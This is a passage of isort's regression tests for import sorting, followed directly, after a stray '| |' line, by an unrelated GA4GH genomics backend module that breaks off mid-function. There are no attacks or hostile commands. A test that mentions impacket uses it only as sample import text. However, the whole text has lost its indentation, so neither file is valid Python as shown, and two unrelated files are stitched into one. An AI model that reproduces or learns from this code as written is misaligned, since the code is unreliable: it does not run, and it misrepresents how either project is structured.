show_diff=True,
)
def test_isort_doesnt_misplace_comments_issue_1431():
"""Test to ensure isort wont misplace comments.
See: https://github.com/PyCQA/isort/issues/1431
"""
input_text = """from com.my_lovely_company.my_lovely_team.my_lovely_project.my_lovely_component import (
MyLovelyCompanyTeamProjectComponent, # NOT DRY
)
from com.my_lovely_company.my_lovely_team.my_lovely_project.my_lovely_component import (
MyLovelyCompanyTeamProjectComponent as component, # DRY
)
"""
assert isort.code(input_text, profile="black") == input_text
def test_isort_doesnt_misplace_add_import_issue_1445():
"""Test to ensure isort won't misplace an added import depending on docstring position
See: https://github.com/PyCQA/isort/issues/1445
"""
assert (
isort.code(
'''#!/usr/bin/env python
"""module docstring"""
''',
add_imports=["import os"],
)
== '''#!/usr/bin/env python
"""module docstring"""
import os
'''
)
assert isort.check_code(
'''#!/usr/bin/env python
"""module docstring"""
import os
''',
add_imports=["import os"],
show_diff=True,
)
def test_isort_doesnt_mangle_code_when_adding_imports_issue_1444():
"""isort should NEVER mangle code. This particularly nasty and easy to reproduce bug,
caused isort to produce invalid code just by adding a single import statement depending
on comment placement.
See: https://github.com/PyCQA/isort/issues/1444
"""
assert (
isort.code(
'''
"""module docstring"""
''',
add_imports=["import os"],
)
== '''
"""module docstring"""
import os
'''
)
def test_isort_float_to_top_with_sort_on_off_tests():
"""Characterization test for current behaviour of float-to-top on isort: on/off sections.
- imports in isort:off sections stay where they are
- imports in isort:on sections float up, but to the top of the isort:on section (not the
top of the file)"""
assert (
isort.code(
"""
def foo():
pass
import a
# isort: off
import stays_in_section
x = 1
import stays_in_place
# isort: on
def bar():
pass
import floats_to_top_of_section
def baz():
pass
""",
float_to_top=True,
)
== """import a
def foo():
pass
# isort: off
import stays_in_section
x = 1
import stays_in_place
# isort: on
import floats_to_top_of_section
def bar():
pass
def baz():
pass
"""
)
to_sort = """# isort: off
def foo():
pass
import stays_in_place
import no_float_to_to_top
import no_ordering
def bar():
pass
"""
# No changes if isort is off
assert isort.code(to_sort, float_to_top=True) == to_sort
def test_isort_doesnt_float_to_top_correctly_when_imports_not_at_top_issue_1382():
"""isort should float existing imports to the top, if they are currently below the top.
See: https://github.com/PyCQA/isort/issues/1382
"""
assert (
isort.code(
"""
def foo():
pass
import a
def bar():
pass
""",
float_to_top=True,
)
== """import a
def foo():
pass
def bar():
pass
"""
)
assert (
isort.code(
"""
def foo():
pass
import a
def bar():
pass
""",
float_to_top=True,
)
== """import a
def foo():
pass
def bar():
pass
"""
)
assert (
isort.code(
'''"""My comment
"""
def foo():
pass
import a
def bar():
pass
''',
float_to_top=True,
)
== '''"""My comment
"""
import a
def foo():
pass
def bar():
pass
'''
)
assert (
isort.code(
'''
"""My comment
"""
def foo():
pass
import a
def bar():
pass
''',
float_to_top=True,
)
== '''
"""My comment
"""
import a
def foo():
pass
def bar():
pass
'''
)
assert (
isort.code(
'''#!/bin/bash
"""My comment
"""
def foo():
pass
import a
def bar():
pass
''',
float_to_top=True,
)
== '''#!/bin/bash
"""My comment
"""
import a
def foo():
pass
def bar():
pass
'''
)
assert (
isort.code(
'''#!/bin/bash
"""My comment
"""
def foo():
pass
import a
def bar():
pass
''',
float_to_top=True,
)
== '''#!/bin/bash
"""My comment
"""
import a
def foo():
pass
def bar():
pass
'''
)
def test_empty_float_to_top_shouldnt_error_issue_1453():
"""isort shouldn't error when float to top is set with a mostly empty file"""
assert isort.check_code(
"""
""",
show_diff=True,
float_to_top=True,
)
assert isort.check_code(
"""
""",
show_diff=True,
)
def test_import_sorting_shouldnt_be_endless_with_headers_issue_1454():
"""isort should never enter an endless sorting loop.
See: https://github.com/PyCQA/isort/issues/1454
"""
assert isort.check_code(
"""
# standard library imports
import sys
try:
# Comment about local lib
# related third party imports
from local_lib import stuff
except ImportError as e:
pass
""",
known_third_party=["local_lib"],
import_heading_thirdparty="related third party imports",
show_diff=True,
)
def test_isort_should_leave_non_import_from_lines_alone_issue_1488():
"""isort should never mangle non-import from statements.
See: https://github.com/PyCQA/isort/issues/1488
"""
raise_from_should_be_ignored = """
raise SomeException("Blah") \\
from exceptionsInfo.popitem()[1]
"""
assert isort.check_code(raise_from_should_be_ignored, show_diff=True)
yield_from_should_be_ignored = """
def generator_function():
yield \\
from other_function()[1]
"""
assert isort.check_code(yield_from_should_be_ignored, show_diff=True)
wont_ignore_comment_contiuation = """
# one
# two
def function():
# three \\
import b
import a
"""
assert (
isort.code(wont_ignore_comment_contiuation)
== """
# one
# two
def function():
# three \\
import a
import b
"""
)
will_ignore_if_non_comment_continuation = """
# one
# two
def function():
raise \\
import b
import a
"""
assert isort.check_code(will_ignore_if_non_comment_continuation, show_diff=True)
yield_from_parens_should_be_ignored = """
def generator_function():
(
yield
from other_function()[1]
)
"""
assert isort.check_code(yield_from_parens_should_be_ignored, show_diff=True)
yield_from_lots_of_parens_and_space_should_be_ignored = """
def generator_function():
(
(
((((
(((((
((
(((
yield
from other_function()[1]
)))))))))))))
)))
"""
assert isort.check_code(yield_from_lots_of_parens_and_space_should_be_ignored, show_diff=True)
yield_from_should_be_ignored_when_following_import_statement = """
def generator_function():
import os
yield \\
from other_function()[1]
"""
assert isort.check_code(
yield_from_should_be_ignored_when_following_import_statement, show_diff=True
)
yield_at_file_end_ignored = """
def generator_function():
(
(
((((
(((((
((
(((
yield
"""
assert isort.check_code(yield_at_file_end_ignored, show_diff=True)
raise_at_file_end_ignored = """
def generator_function():
(
(
((((
(((((
((
(((
raise (
"""
assert isort.check_code(raise_at_file_end_ignored, show_diff=True)
raise_from_at_file_end_ignored = """
def generator_function():
(
(
((((
(((((
((
(((
raise \\
from \\
"""
assert isort.check_code(raise_from_at_file_end_ignored, show_diff=True)
def test_isort_float_to_top_correctly_identifies_single_line_comments_1499():
"""Test to ensure isort correctly handles the case where float to top is used
to push imports to the top and the top comment is a multiline type but only
one line.
See: https://github.com/PyCQA/isort/issues/1499
"""
assert (
isort.code(
'''#!/bin/bash
"""My comment"""
def foo():
pass
import a
def bar():
pass
''',
float_to_top=True,
)
== (
'''#!/bin/bash
"""My comment"""
import a
def foo():
pass
def bar():
pass
'''
)
)
assert (
isort.code(
"""#!/bin/bash
'''My comment'''
def foo():
pass
import a
def bar():
pass
""",
float_to_top=True,
)
== (
"""#!/bin/bash
'''My comment'''
import a
def foo():
pass
def bar():
pass
"""
)
)
assert isort.check_code(
"""#!/bin/bash
'''My comment'''
import a
x = 1
""",
float_to_top=True,
show_diff=True,
)
def test_isort_shouldnt_mangle_from_multi_line_string_issue_1507():
"""isort was seen mangling lines that happened to contain the word from after
a yield happened to be in a file. Clearly this shouldn't happen.
See: https://github.com/PyCQA/isort/issues/1507.
"""
assert isort.check_code(
'''
def a():
yield f(
"""
select %s from (values %%s) as t(%s)
"""
)
def b():
return (
"""
select name
from foo
"""
% main_table
)
def c():
query = (
"""
select {keys}
from (values %s) as t(id)
"""
)
def d():
query = f"""select t.id
from {table} t
{extra}"""
''',
show_diff=True,
)
def test_isort_should_keep_all_as_and_non_as_imports_issue_1523():
"""isort should keep as and non-as imports of the same path that happen to exist within the
same statement.
See: https://github.com/PyCQA/isort/issues/1523.
"""
assert isort.check_code(
"""
from selenium.webdriver import Remote, Remote as Driver
""",
show_diff=True,
combine_as_imports=True,
)
def test_isort_shouldnt_introduce_syntax_error_issue_1539():
"""isort should NEVER introduce syntax errors.
In 5.5.4 some strings that contained a line starting with from could lead to no empty paren.
See: https://github.com/PyCQA/isort/issues/1539.
"""
assert isort.check_code(
'''"""Foobar
from {}""".format(
"bar",
)
''',
show_diff=True,
)
assert isort.check_code(
'''"""Foobar
import {}""".format(
"bar",
)
''',
show_diff=True,
)
assert (
isort.code(
'''"""Foobar
from {}"""
from a import b, a
''',
)
== '''"""Foobar
from {}"""
from a import a, b
'''
)
assert (
isort.code(
'''"""Foobar
from {}"""
import b
import a
''',
)
== '''"""Foobar
from {}"""
import a
import b
'''
)
def test_isort_shouldnt_split_skip_issue_1548():
"""Ensure isort doesn't add a spurious new line if isort: skip is combined with float to top.
See: https://github.com/PyCQA/isort/issues/1548.
"""
assert isort.check_code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
prune_dependencies,
)
""",
show_diff=True,
profile="black",
float_to_top=True,
)
assert isort.check_code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
prune_dependencies,
)
import a
import b
""",
show_diff=True,
profile="black",
float_to_top=True,
)
assert isort.check_code(
"""from tools.dependency_pruning.prune_dependencies import # isort:skip
import a
import b
""",
show_diff=True,
float_to_top=True,
)
assert isort.check_code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
a
)
import b
""",
show_diff=True,
profile="black",
float_to_top=True,
)
assert isort.check_code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
)
""",
show_diff=True,
profile="black",
float_to_top=True,
)
assert isort.check_code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
)""",
show_diff=True,
profile="black",
float_to_top=True,
)
assert (
isort.code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
)
""",
profile="black",
float_to_top=True,
add_imports=["import os"],
)
== """from tools.dependency_pruning.prune_dependencies import ( # isort:skip
)
import os
"""
)
assert (
isort.code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
)""",
profile="black",
float_to_top=True,
add_imports=["import os"],
)
== """from tools.dependency_pruning.prune_dependencies import ( # isort:skip
)
import os
"""
)
def test_isort_shouldnt_split_skip_issue_1556():
assert isort.check_code(
"""
from tools.dependency_pruning.prune_dependencies import ( # isort:skip
prune_dependencies,
)
from tools.developer_pruning.prune_developers import ( # isort:skip
prune_developers,
)
""",
show_diff=True,
profile="black",
float_to_top=True,
)
assert isort.check_code(
"""
from tools.dependency_pruning.prune_dependencies import ( # isort:skip
prune_dependencies,
)
from tools.developer_pruning.prune_developers import x # isort:skip
""",
show_diff=True,
profile="black",
float_to_top=True,
)
def test_isort_losing_imports_vertical_prefix_from_module_import_wrap_mode_issue_1542():
"""Ensure isort doesnt lose imports when a comment is combined with an import and
wrap mode VERTICAL_PREFIX_FROM_MODULE_IMPORT is used.
See: https://github.com/PyCQA/isort/issues/1542.
"""
assert (
isort.code(
"""
from xxxxxxxxxxxxxxxx import AAAAAAAAAA, BBBBBBBBBB
from xxxxxxxxxxxxxxxx import CCCCCCCCC, DDDDDDDDD # xxxxxxxxxxxxxxxxxx
print(CCCCCCCCC)
""",
multi_line_output=9,
)
== """
from xxxxxxxxxxxxxxxx import AAAAAAAAAA, BBBBBBBBBB # xxxxxxxxxxxxxxxxxx
from xxxxxxxxxxxxxxxx import CCCCCCCCC, DDDDDDDDD
print(CCCCCCCCC)
"""
)
assert isort.check_code(
"""
from xxxxxxxxxxxxxxxx import AAAAAAAAAA, BBBBBBBBBB
from xxxxxxxxxxxxxxxx import CCCCCCCCC, DDDDDDDDD # xxxxxxxxxxxxxxxxxx isort: skip
print(CCCCCCCCC)
""",
show_diff=True,
multi_line_output=9,
)
def test_isort_adding_second_comma_issue_1621():
"""Ensure isort doesnt add a second comma when very long comment is present
See: https://github.com/PyCQA/isort/issues/1621.
"""
assert isort.check_code(
"""from .test import (
TestTestTestTestTestTest2 as TestTestTestTestTestTest1, """
"""# Some really long comment bla bla bla bla bla
)
""",
profile="black",
show_diff=True,
)
assert (
isort.code(
"""from .test import (
TestTestTestTestTestTest2 as TestTestTestTestTestTest1 """
"""# Some really long comment bla bla bla bla bla
)
""",
profile="black",
)
== """from .test import (
TestTestTestTestTestTest2 as TestTestTestTestTestTest1, """
"""# Some really long comment bla bla bla bla bla
)
"""
)
def test_isort_shouldnt_duplicate_comments_issue_1631():
assert isort.check_code(
"""
import a # a comment
import a as b # b comment
""",
show_diff=True,
)
assert (
isort.code(
"""
import a # a comment
import a as a # b comment
""",
remove_redundant_aliases=True,
)
== """
import a # a comment; b comment
"""
)
def test_isort_shouldnt_add_extra_new_lines_with_import_heading_issue_1670():
snippet = """#!/usr/bin/python3 -ttu
# Standard Library
import argparse
import datetime
import attr
import requests
def foo() -> int:
print("Hello world")
return 0
def spam():
# Standard Library
import collections
import logging
"""
assert (
isort.code(
snippet,
import_heading_stdlib="Standard Library",
)
== snippet
)
def test_isort_shouldnt_add_extra_line_float_to_top_issue_1667():
assert isort.check_code(
"""
import sys
sys.path.insert(1, 'path/containing/something_else/..')
import something_else # isort:skip
# Some constant
SOME_CONSTANT = 4
""",
show_diff=True,
float_to_top=True,
)
def test_isort_shouldnt_move_noqa_comment_issue_1594():
assert (
isort.code(
"""
from .test import TestTestTestTestTestTest1 # noqa: F401
from .test import TestTestTestTestTestTest2, TestTestTestTestTestTest3, """
"""TestTestTestTestTestTest4, TestTestTestTestTestTest5 # noqa: F401
""",
profile="black",
)
== """
from .test import TestTestTestTestTestTest1 # noqa: F401
from .test import ( # noqa: F401
TestTestTestTestTestTest2,
TestTestTestTestTestTest3,
TestTestTestTestTestTest4,
TestTestTestTestTestTest5,
)
"""
)
def test_isort_correctly_handles_unix_vs_linux_newlines_issue_1566():
import_statement = (
"from impacket.smb3structs import (\n"
"SMB2_CREATE, SMB2_FLAGS_DFS_OPERATIONS, SMB2_IL_IMPERSONATION, "
"SMB2_OPLOCK_LEVEL_NONE, SMB2Create,"
"\nSMB2Create_Response, SMB2Packet)\n"
)
assert isort.code(import_statement, line_length=120) == isort.code(
import_statement.replace("\n", "\r\n"), line_length=120
).replace("\r\n", "\n")
def test_isort_treats_src_paths_same_as_from_config_as_cli_issue_1711(tmpdir):
assert isort.check_code(
"""
import mymodule
import sqlalchemy
""",
show_diff=True,
)
config_file = tmpdir.join(".isort.cfg")
config_file.write(
"""
[settings]
src_paths=
api
"""
)
api_dir = tmpdir.mkdir("api")
api_dir.join("mymodule.py").write("# comment")
config = isort.settings.Config(str(config_file))
assert isort.check_code(
"""
import sqlalchemy
import mymodule
""",
show_diff=True,
config=config,
)
def test_isort_should_never_quietly_remove_imports_in_hanging_line_mode_issue_1741():
assert (
isort.code(
"""
from src import abcd, qwerty, efg, xyz # some comment
""",
line_length=50,
multi_line_output=2,
)
== """
from src import abcd, efg, qwerty, xyz \\
# some comment
"""
)
assert (
isort.code(
"""
from src import abcd, qwerty, efg, xyz # some comment
""",
line_length=54,
multi_line_output=2,
)
== """
from src import abcd, efg, qwerty, xyz # some comment
"""
)
assert (
isort.code(
"""
from src import abcd, qwerty, efg, xyz # some comment
""",
line_length=53,
multi_line_output=2,
)
== """
from src import abcd, efg, qwerty, xyz \\
# some comment
"""
)
assert (
isort.code(
"""
from src import abcd, qwerty, efg, xyz # some comment
""",
line_length=30,
multi_line_output=2,
)
== """
from src import abcd, efg, \\
qwerty, xyz \\
# some comment
"""
)
@pytest.mark.parametrize("multi_line_output", range(12))
def test_isort_should_never_quietly_remove_imports_in_any_hangin_mode_issue_1741(
multi_line_output: int,
):
sorted_code = isort.code(
"""
from src import abcd, qwerty, efg, xyz # some comment
""",
line_length=30,
multi_line_output=multi_line_output,
)
assert "abcd" in sorted_code
assert "qwerty" in sorted_code
assert "efg" in sorted_code
assert "xyz" in sorted_code
def test_isort_should_keep_multi_noqa_with_star_issue_1744():
assert isort.check_code(
"""
from typing import * # noqa
from typing import IO, BinaryIO, Union # noqa
""",
show_diff=True,
)
assert isort.check_code(
"""
from typing import * # noqa 1
from typing import IO, BinaryIO, Union # noqa 2
""",
show_diff=True,
)
assert isort.check_code(
"""
from typing import * # noqa
from typing import IO, BinaryIO, Union
""",
show_diff=True,
)
assert isort.check_code(
"""
from typing import *
from typing import IO, BinaryIO, Union # noqa
""",
show_diff=True,
)
assert (
isort.code(
"""
from typing import * # hi
from typing import IO, BinaryIO, Union # noqa
""",
combine_star=True,
)
== """
from typing import * # noqa; hi
"""
)
assert (
isort.code(
"""
from typing import * # noqa
from typing import IO, BinaryIO, Union # noqa
""",
combine_star=True,
)
== """
from typing import * # noqa
"""
)
def test_isort_should_keep_multiple_noqa_comments_force_single_line_mode_issue_1721():
assert isort.check_code(
"""
from some_very_long_filename_to_import_from_that_causes_a_too_long_import_row import ( # noqa: E501
CONSTANT_1,
)
from some_very_long_filename_to_import_from_that_causes_a_too_long_import_row import ( # noqa: E501
CONSTANT_2,
)
""",
show_diff=True,
profile="black",
force_single_line=True,
)
def test_isort_should_only_add_imports_to_valid_location_issue_1769():
assert (
isort.code(
'''v = """
""".split(
"\n"
)
''',
add_imports=["from __future__ import annotations"],
)
== '''from __future__ import annotations
v = """
""".split(
"\n"
)
'''
)
assert (
isort.code(
'''v=""""""''',
add_imports=["from __future__ import annotations"],
)
== '''from __future__ import annotations
v=""""""
'''
)
def test_literal_sort_at_top_of_file_issue_1792():
assert (
isort.code(
'''"""I'm a docstring! Look at me!"""
# isort: unique-list
__all__ = ["Foo", "Foo", "Bar"]
from typing import final # arbitrary
@final
class Foo:
...
@final
class Bar:
...
'''
)
== '''"""I'm a docstring! Look at me!"""
# isort: unique-list
__all__ = ['Bar', 'Foo']
from typing import final # arbitrary
@final
class Foo:
...
@final
class Bar:
...
'''
)
def test_isort_should_produce_the_same_code_on_subsequent_runs_issue_1799(tmpdir):
code = """import sys
if sys.version_info[:2] >= (3, 8):
# TODO: Import directly (no need for conditional) when `python_requires = >= 3.8`
from importlib.metadata import PackageNotFoundError, version # pragma: no cover
else:
from importlib_metadata import PackageNotFoundError, version # pragma: no cover
"""
config_file = tmpdir.join(".isort.cfg")
config_file.write(
"""[isort]
profile=black
src_paths=isort,test
line_length=100
skip=.tox,.venv,build,dist,docs,tests
extra_standard_library=pkg_resources,setuptools,typing
known_test=pytest
known_first_party=ibpt
sections=FUTURE,STDLIB,TEST,THIRDPARTY,FIRSTPARTY,LOCALFOLDER
import_heading_firstparty=internal
import_heading_thirdparty=external
"""
)
settings = isort.settings.Config(str(config_file))
assert isort.code(code, config=settings) == isort.code(
isort.code(code, config=settings), config=settings
)
| |
"""
Module responsible for handling protocol requests and returning
responses.
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import json
import random
import ga4gh.datamodel as datamodel
import ga4gh.datamodel.datasets as datasets
import ga4gh.datamodel.references as references
import ga4gh.exceptions as exceptions
import ga4gh.protocol as protocol
def _parsePageToken(pageToken, numValues):
"""
Parses the specified pageToken and returns a list of the specified
number of values. Page tokens are assumed to consist of a fixed
number of integers seperated by colons. If the page token does
not conform to this specification, raise a InvalidPageToken
exception.
"""
tokens = pageToken.split(":")
if len(tokens) != numValues:
msg = "Invalid number of values in page token"
raise exceptions.BadPageTokenException(msg)
try:
values = map(int, tokens)
except ValueError:
msg = "Malformed integers in page token"
raise exceptions.BadPageTokenException(msg)
return values
def _getVariantSet(request, variantSetIdMap):
variantSetId = request.variantSetId
variantSet = _safeMapQuery(
variantSetIdMap, variantSetId,
exceptionClass=exceptions.VariantSetNotFoundException)
return variantSet
def _safeMapQuery(idMap, id_, exceptionClass=None, idErrorString=None):
"""
Attempt to retrieve a value from a map, throw an appropriate error
if the key is not present
"""
try:
obj = idMap[id_]
except KeyError:
if idErrorString is None:
idErrorString = id_
if exceptionClass is None:
exceptionClass = exceptions.ObjectWithIdNotFoundException
raise exceptionClass(idErrorString)
return obj
class IntervalIterator(object):
"""
Implements generator logic for types which accept a start/end
range to search for the object. Returns an iterator over
(object, pageToken) pairs. The pageToken is a string which allows
us to pick up the iteration at any point, and is None for the last
value in the iterator.
"""
def __init__(self, request, containerIdMap):
self._request = request
self._containerIdMap = containerIdMap
self._container = self._getContainer()
self._searchIterator = None
self._currentObject = None
self._nextObject = None
self._searchAnchor = None
self._distanceFromAnchor = None
if request.pageToken is None:
self._initialiseIteration()
else:
# Set the search start point and the number of records to skip from
# the page token.
searchAnchor, objectsToSkip = _parsePageToken(request.pageToken, 2)
self._pickUpIteration(searchAnchor, objectsToSkip)
def _initialiseIteration(self):
"""
Starts a new iteration.
"""
self._searchIterator = self._search(
self._request.start, self._request.end)
self._currentObject = next(self._searchIterator, None)
if self._currentObject is not None:
self._nextObject = next(self._searchIterator, None)
self._searchAnchor = self._request.start
self._distanceFromAnchor = 0
firstObjectStart = self._getStart(self._currentObject)
if firstObjectStart > self._request.start:
self._searchAnchor = firstObjectStart
def _pickUpIteration(self, searchAnchor, objectsToSkip):
"""
Picks up iteration from a previously provided page token. There are two
different phases here:
1) We are iterating over the initial set of intervals in which start
is < the search start coorindate.
2) We are iterating over the remaining intervals in which start >= to
the search start coordinate.
"""
self._searchAnchor = searchAnchor
self._distanceFromAnchor = objectsToSkip
self._searchIterator = self._search(searchAnchor, self._request.end)
obj = next(self._searchIterator)
if searchAnchor == self._request.start:
# This is the initial set of intervals, we just skip forward
# objectsToSkip positions
for _ in range(objectsToSkip):
obj = next(self._searchIterator)
else:
# Now, we are past this initial set of intervals.
# First, we need to skip forward over the intervals where
# start < searchAnchor, as we've seen these already.
while self._getStart(obj) < searchAnchor:
obj = next(self._searchIterator)
# Now, we skip over objectsToSkip objects such that
# start == searchAnchor
for _ in range(objectsToSkip):
assert self._getStart(obj) == searchAnchor
obj = next(self._searchIterator)
self._currentObject = obj
self._nextObject = next(self._searchIterator, None)
def next(self):
"""
Returns the next (object, nextPageToken) pair.
"""
if self._currentObject is None:
raise StopIteration()
nextPageToken = None
if self._nextObject is not None:
start = self._getStart(self._nextObject)
# If start > the search anchor, move the search anchor. Otherwise,
# increment the distance from the anchor.
if start > self._searchAnchor:
self._searchAnchor = start
self._distanceFromAnchor = 0
else:
self._distanceFromAnchor += 1
nextPageToken = "{}:{}".format(
self._searchAnchor, self._distanceFromAnchor)
ret = self._currentObject, nextPageToken
self._currentObject = self._nextObject
self._nextObject = next(self._searchIterator, None)
return ret
def __iter__(self):
return self
class ReadsIntervalIterator(IntervalIterator):
"""
An interval iterator for reads
"""
def _getContainer(self):
if len(self._request.readGroupIds) != 1:
if len(self._request.readGroupIds) == 0:
msg = "Read search requires a readGroup to be specified"
else:
msg = "Read search over multiple readGroups not supported"
raise exceptions.NotImplementedException(msg)
readGroupId = self._request.readGroupIds[0]
readGroup = _safeMapQuery(
self._containerIdMap, readGroupId,
exceptions.ReadGroupNotFoundException)
return readGroup
def _search(self, start, end):
return self._container.getReadAlignments(
self._request.referenceId, start, end)
@classmethod
def _getStart(cls, readAlignment):
return readAlignment.alignment.position.position
@classmethod
def _getEnd(cls, readAlignment):
return cls._getStart(readAlignment) + \
len(readAlignment.alignedSequence)
class VariantsIntervalIterator(IntervalIterator):
"""
An interval iterator for variants
"""
def _getContainer(self):
return _getVariantSet(self._request, self._containerIdMap)
def _search(self, start, end):
return self._container.getVariants(
self._request.referenceName, start, end, self._request.variantName,
self._request.callSetIds)
@classmethod
def _getStart(cls, variant):
return variant.start
@classmethod
def _getEnd(cls, variant):
return variant.end
class AbstractBackend(object):
"""
An abstract GA4GH backend.
This class provides methods for all of the GA4GH protocol end points.
"""
def __init__(self):
self._referenceSetIdMap = {}
self._referenceSetIds = []
self._referenceIdMap = {}
self._referenceIds = []
self._requestValidation = False
self._responseValidation = False
self._defaultPageSize = 100
self._maxResponseLength = 2**20 # 1 MiB
self._datasetIdMap = {}
self._datasetIds = []
def setRequestValidation(self, requestValidation):
"""
Set enabling request validation
"""
self._requestValidation = requestValidation
def setResponseValidation(self, responseValidation):
"""
Set enabling response validation
"""
self._responseValidation = responseValidation
def setDefaultPageSize(self, defaultPageSize):
"""
Sets the default page size for request to the specified value.
"""
self._defaultPageSize = defaultPageSize
def setMaxResponseLength(self, maxResponseLength):
"""
Sets the approximate maximum response length to the specified
value.
"""
self._maxResponseLength = maxResponseLength
def getDatasetIds(self):
"""
Returns a list of datasets in this backend
"""
return self._datasetIds
def getDataset(self, datasetId):
"""
Returns a dataset with id datasetId
"""
return _safeMapQuery(
self._datasetIdMap, datasetId,
exceptions.DatasetNotFoundException)
def getReferenceSets(self):
"""
Returns the list of ReferenceSets in this backend
"""
return list(self._referenceSetIdMap.values())
def startProfile(self):
"""
Profiling hook. Called at the start of the runSearchRequest method
and allows for detailed profiling of search performance.
"""
pass
def endProfile(self):
"""
Profiling hook. Called at the end of the runSearchRequest method.
"""
pass
def validateRequest(self, jsonDict, requestClass):
"""
Ensures the jsonDict corresponds to a valid instance of requestClass
Throws an error if the data is invalid
"""
if self._requestValidation:
if not requestClass.validate(jsonDict):
raise exceptions.RequestValidationFailureException(
jsonDict, requestClass)
def validateResponse(self, jsonString, responseClass):
"""
Ensures the jsonDict corresponds to a valid instance of responseClass
Throws an error if the data is invalid
"""
if self._responseValidation:
jsonDict = json.loads(jsonString)
if not responseClass.validate(jsonDict):
raise exceptions.ResponseValidationFailureException(
jsonDict, responseClass)
###########################################################
#
# Iterators over the data hierarchy. These methods help to
# implement the search endpoints by providing iterators
# over the objects to be returned to the client.
#
###########################################################
def _topLevelObjectGenerator(self, request, idMap, idList):
"""
Generalisation of the code to iterate over the objects at the top
of the data hierarchy.
"""
currentIndex = 0
if request.pageToken is not None:
currentIndex, = _parsePageToken(request.pageToken, 1)
while currentIndex < len(idList):
objectId = idList[currentIndex]
object_ = idMap[objectId]
currentIndex += 1
nextPageToken = None
if currentIndex < len(idList):
nextPageToken = str(currentIndex)
yield object_.toProtocolElement(), nextPageToken
def datasetsGenerator(self, request):
"""
Returns a generator over the (dataset, nextPageToken) pairs
defined by the specified request
"""
return self._topLevelObjectGenerator(
request, self._datasetIdMap, self._datasetIds)
def readGroupSetsGenerator(self, request):
"""
Returns a generator over the (readGroupSet, nextPageToken) pairs
defined by the specified request.
"""
dataset = self.getDataset(request.datasetId)
return self._topLevelObjectGenerator(
request, dataset.getReadGroupSetIdMap(),
dataset.getReadGroupSetIds())
def referenceSetsGenerator(self, request):
"""
Returns a generator over the (referenceSet, nextPageToken) pairs
defined by the specified request.
"""
return self._topLevelObjectGenerator(
request, self._referenceSetIdMap, self._referenceSetIds)
def referencesGenerator(self, request):
"""
Returns a generator over the (reference, nextPageToken) pairs
defined by the specified request.
"""
return self._topLevelObjectGenerator(
request, self._referenceIdMap, self._referenceIds)
def variantSetsGenerator(self, request):
"""
Returns a generator over the (variantSet, nextPageToken) pairs defined
by the specified request.
"""
dataset = self.getDataset(request.datasetId)
return self._topLevelObjectGenerator(
request, dataset.getVariantSetIdMap(),
dataset.getVariantSetIds())
def readsGenerator(self, request):
"""
Returns a generator over the (read, nextPageToken) pairs defined
by the specified request
"""
if request.referenceId is None:
raise exceptions.UnmappedReadsNotSupported()
if len(request.readGroupIds) != 1:
raise exceptions.NotImplementedException(
"Exactly one read group id must be specified")
compoundId = datamodel.ReadGroupCompoundId.parse(
request.readGroupIds[0])
dataset = self.getDataset(compoundId.datasetId)
intervalIterator = ReadsIntervalIterator(
request, dataset.getReadGroupIdMap())
return intervalIterator
def variantsGenerator(self, request):
"""
Returns a generator over the (variant, nextPageToken) pairs defined
by the specified request.
"""
compoundId = datamodel.VariantSetCompoundId.parse(request.variantSetId)
dataset = self.getDataset(compoundId.datasetId)
intervalIterator = VariantsIntervalIterator(
request, dataset.getVariantSetIdMap())
return intervalIterator
def callSetsGenerator(self, request):
"""
Returns a generator over the (callSet, nextPageToken) pairs defined
by the specified request.
"""
if request.name is not None:
raise exceptions.NotImplementedException(
"Searching over names is not supported")
compoundId = datamodel.VariantSetCompoundId.parse(request.variantSetId)
dataset = self.getDataset(compoundId.datasetId)
variantSet = _getVariantSet(
request, dataset.getVariantSetIdMap())
return self._topLevelObjectGenerator(
request, variantSet.getCallSetIdMap(),
variantSet.getCallSetIds())
###########################################################
#
# Public API methods. Each of these methods implements the
# corresponding API end point, and return data ready to be
# written to the wire.
#
###########################################################
def runGetRequest(self, idMap, id_):
"""
Runs a get request by indexing into the provided idMap and
returning a json string of that object
"""
obj = _safeMapQuery(idMap, id_)
protocolElement = obj.toProtocolElement()
jsonString = protocolElement.toJsonString()
return jsonString
def runSearchRequest(
self, requestStr, requestClass, responseClass, objectGenerator):
"""
Runs the specified request. The request is a string containing
a JSON representation of an instance of the specified requestClass.
We return a string representation of an instance of the specified
responseClass in JSON format. Objects are filled into the page list
using the specified object generator, which must return
(object, nextPageToken) pairs, and be able to resume iteration from
any point using the nextPageToken attribute of the request object.
"""
self.startProfile()
try:
requestDict = json.loads(requestStr)
except ValueError:
raise exceptions.InvalidJsonException(requestStr)
self.validateRequest(requestDict, requestClass)
request = requestClass.fromJsonDict(requestDict)
if request.pageSize is None:
request.pageSize = self._defaultPageSize
if request.pageSize <= 0:
raise exceptions.BadPageSizeException(request.pageSize)
responseBuilder = protocol.SearchResponseBuilder(
responseClass, request.pageSize, self._maxResponseLength)
nextPageToken = None
for obj, nextPageToken in objectGenerator(request):
responseBuilder.addValue(obj)
if responseBuilder.isFull():
break
responseBuilder.setNextPageToken(nextPageToken)
responseString = responseBuilder.getJsonString()
self.validateResponse(responseString, responseClass)
self.endProfile()
return responseString
def runGetCallset(self, id_):
"""
Returns a callset with the given id
"""
compoundId = datamodel.CallSetCompoundId.parse(id_)
dataset = self.getDataset(compoundId.datasetId)
variantSet = _getVariantSet(
compoundId, dataset.getVariantSetIdMap())
return self.runGetRequest(variantSet.getCallSetIdMap(), id_)
def runListReferenceBases(self, id_, requestArgs):
"""
Runs a listReferenceBases request for the specified ID and
request arguments.
"""
# parse arguments
reference = _safeMapQuery(
self._referenceIdMap, id_,
exceptions.ObjectWithIdNotFoundException)
start = 0
end = datamodel.PysamDatamodelMixin.fastaMax
if 'start' in requestArgs:
startString = requestArgs['start']
try:
start = int(startString)
except ValueError:
raise exceptions.BadRequestIntegerException(
'start', startString)
if 'end' in requestArgs:
endString = requestArgs['end']
try:
end = int(endString)
except ValueError:
raise exceptions.BadRequestIntegerException(
'end', endString)
if 'pageToken' in requestArgs:
pageTokenStr = requestArgs['pageToken']
start = _parsePageToken(pageTokenStr, 1)[0]
